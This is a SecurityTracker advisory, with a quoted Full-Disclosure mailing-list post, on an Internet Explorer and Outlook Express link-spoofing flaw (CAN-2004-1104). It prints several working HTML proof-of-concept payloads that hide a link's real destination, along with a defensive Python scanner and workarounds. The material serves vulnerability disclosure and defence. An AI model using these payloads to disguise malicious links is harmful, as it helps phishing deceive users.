(A Variation is Reported) Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data
SecurityTracker Alert ID: 1013221
SecurityTracker URL: http://securitytracker.com/id?1013221
CVE Reference: CAN-2004-1104
Date: Feb 17 2005
Impact: Modification of system information
Exploit Included: Yes
Version(s): 6
Description: A vulnerability was reported in Microsoft Internet Explorer. A remote user can create HTML with an embedded link that spoofs the destination URL and causes the browser to fail to display the actual destination URL. Microsoft Outlook Express is also affected.

malware reported that a remote user can create HTML that contains a link with an HTML FORM action embedded within the link. The browser's status bar will display the link address but not the FORM action address. However, the browser will load the FORM action.

Demonstration exploit HTML can be in the following form:
<A href="http://[apparent destination]">
<FORM action=[actual destination] method=get>
<INPUT
style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;
TEXT-DECORATION: underline" type=submit value=http://[apparent destination]>
</A>

A remote user can create HTML with a spoofed link that, when loaded by the target user, will direct the target user's browser to a malicious URL which can then redirect the target user to the spoofed link. In this manner, the target user may be completely unaware of the malicious action.

A demonstration exploit is available at:
http://www.malware.com/not-so-good.zip

In October 2004, malware reported that a BASE HREF tag is also affected [CVE: CAN-2004-1104]. A demonstration exploit is provided:
<base href="http://www.microsoft.com">
<a href=><form action="http://www.malware.com" method="get"><INPUT
style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com></form></a>

A demonstration exploit is available at:
http://www.malware.com/mwaresoft.html

Bitlance winter later reported a variation of this vulnerability that uses a label tag. A demonstration exploit is provided:
<body style="color: WindowText; background-color: Window;">
<div>IE/OE Restricted Zone Status Bar Spoofing</div>
<div>Tested on Windows XP with SP2 installed.</div>
<p><a id="SPOOF" href="http://www.example.com/?maliciouscontents"></a></p>
<div>
<a href="http://www.microsoft.com/windows/default.mspx">
<table>
<caption>
<a href="http://www.microsoft.com/windows/default.mspx ">
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
</u>
</label>
</a>
</caption>
</table>
</a>
</div>
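
A defensive check for the patterns described above, as an added example that is not part of the original advisory: a Python scanner, usable in a mail or proxy filter, that flags a FORM nested inside a link and a LABEL inside a link whose "for" target is a different link. The class and function names and the sample markup (example domains) are constructed for illustration.

```python
from html.parser import HTMLParser

# Constructed samples modelled on the patterns above (example domains, not from the page).
FORM_SAMPLE = ('<a href="http://shown.example/"><form action="http://other.example/" method=get>'
               '<input type=submit value="http://shown.example/"></form></a>')
LABEL_SAMPLE = ('<a id="t" href="http://other.example/"></a>'
                '<a href="http://shown.example/"><label for="t">http://shown.example/</label></a>')
BENIGN = '<a href="http://shown.example/">home</a><form action="/search"><input type=submit></form>'

class LinkSpoofScanner(HTMLParser):
    """Flags markup where a click inside <a> can navigate somewhere other than its href."""
    def __init__(self):
        super().__init__()
        self.anchors = []   # hrefs of the <a> elements currently open
        self.ids = {}       # id -> href for every <a id=...> seen
        self.labels = []    # (for-id, enclosing href) for each <label> inside a link
        self.findings = []  # (kind, displayed href, actual destination)

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        a = dict(attrs)
        if tag == "a":
            href = (a.get("href") or "").strip()
            self.anchors.append(href)
            if a.get("id"):
                self.ids[a["id"]] = href
        elif not self.anchors:
            return                          # outside any link: nothing to compare against
        elif tag == "form":
            self.findings.append(("form-in-link", self.anchors[-1], a.get("action") or ""))
        elif tag == "label" and a.get("for"):
            self.labels.append((a["for"], self.anchors[-1]))

    def handle_endtag(self, tag):
        if tag == "a" and self.anchors:
            self.anchors.pop()

def scan(html):
    s = LinkSpoofScanner()
    s.feed(html)
    s.close()
    for target, shown in s.labels:          # resolved last: the labelled id may appear later
        actual = s.ids.get(target)
        if actual is not None and actual != shown:
            s.findings.append(("label-redirect", shown, actual))
    return s.findings

if __name__ == "__main__":
    for name, doc in [("form", FORM_SAMPLE), ("label", LABEL_SAMPLE), ("benign", BENIGN)]:
        print(name, scan(doc))
```

The scanner does not require a closing FORM tag, so markup shaped like the first demonstration (which omits it) is still flagged.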

Impact: A remote user can create a spoofed link that will load an arbitrary URL.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/technet/security/
Cause: Input validation error, State error
Underlying OS: Windows (Any)
Reported By: "winter bitlance" <bitlance_3@hotmail.com>
Message History: This archive entry is a follow-up to the message listed below.

Source Message Contents
Date: Thu, 17 Feb 2005 05:22:08 +0000
From: "winter bitlance" <bitlance_3@hotmail.com>
Subject: [Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing
Hi LIST.
It is normally possible for script code to manipulate information displayed
in the status bar in the Internet Zone. By default, Outlook Express 6 opens
HTML e-mail messages in the Restricted sites zone instead of the Internet
Zone. Outlook Express users may especially trust information displayed in
the status bar since HTML documents are viewed in context of the
"Restricted" zone, which has scripting support disabled.
However, errors in Internet Explorer allow manipulation of the status bar
without using any script code. This can be exploited by embedding a
specially crafted form in a link.
http-equiv has discovered a weakness in Internet Explorer, which
potentially can be exploited by malicious people to trick users into
visiting a malicious website which facilitates a "phishing" attack.
(CAN-2004-1104)
Now another weakness which uses a "label for id trick" has been discovered.
This weakness is a variant of CAN-2004-1104.
Example:
- -----8<----- -----8<----- -----8<----- -----8<-----
[!-- saved from url=(0007)http:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="http://www.example.com/?maliciouscontents">[/a>[/ p>
[div>
[a href="http://www.microsoft.com/windows/default.mspx">
[table>
[caption>
[a href="http://www.microsoft.com/windows/default.mspx ">
[label for="SPOOF">
[u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
[/u>
[/label>
[/a>
[/caption>
[/table>
[/a>
[/div>
- -----8<----- -----8<----- -----8<----- -----8<-----
Workaround (on Windows XP Service Pack 2):
You can change the zone elevation setting for each security zone by
configuring the following option from Allow to Disabled or Prompt in the
Custom Level Security dialog.
"Web sites in less privileged Web content zones can navigate into this
zone"
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx
Solution:
Never follow links from untrusted sources.
Read e-mail messages in plain text format if you are using Outlook Express
6 SP1 or a later version, to help protect yourself from the HTML e-mail
attack vector.
REGARDS.
--
bitlance winter